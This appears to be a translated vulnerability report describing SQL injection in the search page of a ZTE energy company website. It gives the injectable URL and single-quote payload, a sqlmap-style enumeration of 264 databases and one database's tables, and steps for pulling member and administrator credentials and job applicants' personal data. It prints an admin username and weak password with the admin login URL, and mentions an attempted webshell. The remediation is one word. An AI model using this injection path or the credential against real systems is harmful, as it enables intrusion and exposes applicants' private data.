SQL Injection at a station of ZTE causes a large amount of information leakage
Information leakage caused by SQL injection at a station of ZTE
ZTE energy
Http://www.zte-e.com/
Injection Point (search page, other page parameters are converted by type, I thought there was no hope, but I found that the search page entered 'an error, the error page shows that the search keyword is not processed. The input type and special characters are displayed ):
Http://www.zte-e.com/cn/Search.aspx? Keyword ='
A total of 264 Databases
web server operating system: Windowsweb application technology: ASP.NET 0back-end DBMS: Microsoft SQL Server 2000available databases [264]:[*] 112233a[*] 123123[*] 123456[*] 123456789[*] 456789[*] adkin66[*] agcom12[*] agronc78[*] aibj789[*] anchic6[*] anco78[*] andfi78[*] atm188[*] aucma001[*] auto66[*] baicyx66[*] bami58[*] bbeon1[*] bbzegs55[*] bdzy70[*] beiji89[*] beijing7[*] besaf55[*] bfguo21[*] bgilt635[*] big64[*] bjbam35[*] bjbio87[*] bjclp5[*] bjdi46[*] bjfe49[*] bjjd665[*] bjjrb[*] bjkdlc1[*] bjkjx1[*] bjmsi02[*] bjrel59[*] bjrenhu7[*] bjrtac23[*] bjsrin12[*] bjsy43[*] bjtddc[*] bjucc11[*] bjw45[*] bjxst74[*] bjzh76[*] blac68[*] blue43[*] buka69[*] chinabei8[*] chinagz7[*] chinar1[*] chnw86[*] chunaifs[*] clorgcn1[*] cnliso21[*] cnnc66[*] coat21[*] comfjzy88[*] commxtx2[*] const49[*] coomexc6[*] cqxdx[*] csrs58[*] culture36[*] cyph66[*] daki15[*] dengm21[*] digibm21[*] dlhold56[*] donghuimuye[*] dqbe21[*] dsbncm1[*] dyer23[*] eduam12[*] emp975[*] expat1[*] expo26[*] fanyoo89[*] fdzd21[*] feng89[*] fgnmining1[*] fjjhep1om[*] fjjinuo1[*] fl5674[*] flgt96[*] gdlccom1[*] gemop89[*] gene54[*] gfedc659[*] great66[*] gree46[*] gree55[*] gsk1[*] gws1necn[*] gwsj76[*] gzjz46[*] hain72[*] haixin13[*] hama13[*] heaven1[*] high88[*] hikag54[*] hlftsb1[*] hntd001[*] hobbe8[*] hongs23[*] hongyi21[*] hotgen13[*] htyq8[*] hua369[*] huabjy1[*] huad19[*] huaf59[*] huafeng123[*] huanzh7[*] huat16[*] huaxia5[*] huaxing9[*] hugeca1[*] hxdy31[*] hyfl978[*] hytctech3[*] inageweb8[*] ind49[*] inox45[*] insm49[*] it05982013[*] jiagu56[*] jinc29[*] jiudia12[*] jnbw84[*] jsyinu67[*] jydi59[*] jyys74[*] kaip698[*] kanglian81[*] kinn46[*] kreaci75[*] land2[*] leim29[*] lhq555[*] lmes87[*] lookstee01[*] lxc574[*] master[*] matri66[*] meikub6[*] mjbjdbsc8[*] model[*] msdb[*] mxx96[*] neoen9[*] northstar3[*] Northwind[*] nunufo44[*] oasisligh[*] offic43[*] office96[*] orac56[*] ork79[*] picarr12[*] pion56[*] pride88[*] prosyn86[*] pubs[*] qbf123[*] qbfaaa[*] reac43[*] read56[*] read66[*] resi46[*] royalrb7[*] rstests[*] rui78[*] sanb48[*] sani75[*] sbc26[*] scil16[*] sczw[*] sdsj2012[*] sdzkf76[*] sdzlhot7[*] season85[*] shangb9[*] shenh21[*] shida12[*] shun94[*] silkr59[*] singbt10[*] sisulanf5[*] sma1om[*] smjmw[*] spainto2[*] splendor[*] sxcc[*] sxss49[*] sxxjdcygl[*] tai76[*] tarcin23[*] tczy8[*] tdhp19[*] tempdb[*] throu79[*] tht66[*] tiantra21[*] tim66[*] tjsjgwy8[*] tjsvw[*] toyojishop[*] tria90[*] truthpro8[*] tyre69[*] tyz946[*] tzm569[*] waimai662[*] whir49[*] whxj86[*] winstm21[*] winstr66[*] winsu85[*] wisvid1[*] wohu58[*] wohu59[*] wohu86[*] wonom21[*] wq5dcost[*] wtnom1[*] wxx45[*] xiang66[*] xingyuan8[*] xion66[*] xito28[*] xsdt123[*] xudanbo[*] xune49[*] xushwebk[*] xuze73[*] yanbet21[*] yolo43[*] yqrms78[*] yrjt28[*] ysjl19[*] ytou46[*] yuexin5[*] yunguist1[*] yunz32[*] yuyuy54[*] ywc84[*] zcl84[*] zgdlcn122[*] zglawye7[*] zgsh43[*] zgxy2012[*] zhsof30[*] zika79[*] zjli42[*] zkpjweb[*] zsclbm1[*] zte1314[*] ztgz46[*] zwcnhj12[*] zwgl03[*] zzyc48
Select zte1314 library to obtain the table
web server operating system: Windowsweb application technology: ASP.NET 0back-end DBMS: Microsoft SQL Server 2000Database: zte1314[37 tables]+------------------------+| sysconstraints || syssegments || zte1314.ApplyJob || zte1314.CityAndCountry || zte1314.Cls_Class || zte1314.Col_News || zte1314.Company || zte1314.Dyue || zte1314.Eexperience || zte1314.GuestBook || zte1314.JianLi || zte1314.Link || zte1314.Link_Class || zte1314.LockAdminIP || zte1314.LogLogin || zte1314.Mail || zte1314.Mail_Model || zte1314.Main_Menu || zte1314.Member || zte1314.News_News || zte1314.Note || zte1314.Ord || zte1314.PList || zte1314.S_Menu || zte1314.S_Model || zte1314.SysA_Admin || zte1314.SysP_Possrss || zte1314.UploadFiles || zte1314.UseSoft || zte1314.WebInfo || zte1314.Wexperience || zte1314.ZLanguage || zte1314.ask || zte1314.jobnew || zte1314.pic || zte1314.userpay || zte1314.vote |+------------------------+
You can use zte1314.Member to obtain the username and password of a member. You can view your resume on the job, including your account, password, name, email address, mobile phone number, salary, and address...
You can modify your resume using your account and password.
You can directly click log on to view details ....
Obtain the administrator username and password in the zte1314.SysA _ Admin table.
Weak background password of the Administrator account
liming/123123
Login background http://www.zte-e.com/manage/AdminLogin.aspx
Funny thing is, the link of ZTE is not an official link...
Because the upload access permission is blocked, webshell cannot be obtained.
Solution:
Filter